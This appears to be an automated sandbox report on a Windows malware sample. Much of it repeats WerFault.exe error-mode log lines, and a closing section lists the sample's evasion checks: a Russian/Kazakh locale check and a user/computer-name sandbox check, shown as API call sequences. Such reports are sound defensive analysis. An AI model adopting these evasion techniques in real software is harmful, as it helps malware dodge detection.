Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Contains functionality to behave differently if execute on a Russian/Kazak computer
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02644B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 2_2_02644B00
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01324B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 5_2_01324B00
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013E4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 6_2_013E4B00
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01514B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 8_2_01514B00
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
